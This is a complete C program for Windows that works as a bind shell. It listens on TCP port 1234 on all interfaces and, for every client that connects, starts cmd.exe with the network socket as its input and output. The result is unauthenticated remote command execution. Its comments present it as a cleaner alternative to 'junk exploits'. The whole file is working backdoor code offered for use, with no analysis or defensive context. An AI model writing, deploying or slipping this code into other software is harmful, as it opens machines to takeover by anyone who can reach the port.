// just simple and safe multi-threaded code that spawns command prompt on a win32 system
  
  // you might notice how all the junk exploits don't close handles properly ;)

#include <stdio.h>
#include <windows.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32.lib")

DWORD WINAPI ThreadProc(LPVOID lpParameter)
{
      PROCESS_INFORMATION pi;
      STARTUPINFO si;

      ZeroMemory(&si,sizeof(si));
      ZeroMemory(&pi,sizeof(pi));

      si.cb      = sizeof(si);
      si.hStdError  = lpParameter;
      si.hStdInput  = lpParameter;
      si.hStdOutput = lpParameter;
      si.dwFlags    = STARTF_USESTDHANDLES;

      CreateProcess(NULL,"cmd",NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi);
      WaitForSingleObject(pi.hProcess,INFINITE);

      CloseHandle(pi.hProcess);
      CloseHandle(pi.hThread);

      closesocket((SOCKET)lpParameter);
      ExitThread(0);
}

int main(int argc, char **argv[])
{
      WSADATA wsaData;
      sockaddr_in service;
      SOCKET server,client;

      if((WSAStartup(MAKEWORD(2,0),&wsaData)) == 0) {

          if((server = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_IP,NULL,0,NULL)) != INVALID_SOCKET) {

              service.sin_addr.S_un.S_addr   = INADDR_ANY;
              service.sin_port               = htons(1234);
              service.sin_family             = AF_INET;

              if(!bind(server,(SOCKADDR*)&service,sizeof(service))) {

                  if(!listen(server,0)) {

                      while((client = accept(server,0,0)) != SOCKET_ERROR) {
                          
                          CloseHandle(CreateThread(NULL,NULL,ThreadProc,(LPVOID)client,NULL,NULL));
                      }
      }
              }
              closesocket(server);
          }
  WSACleanup();
  }
  return(0);
}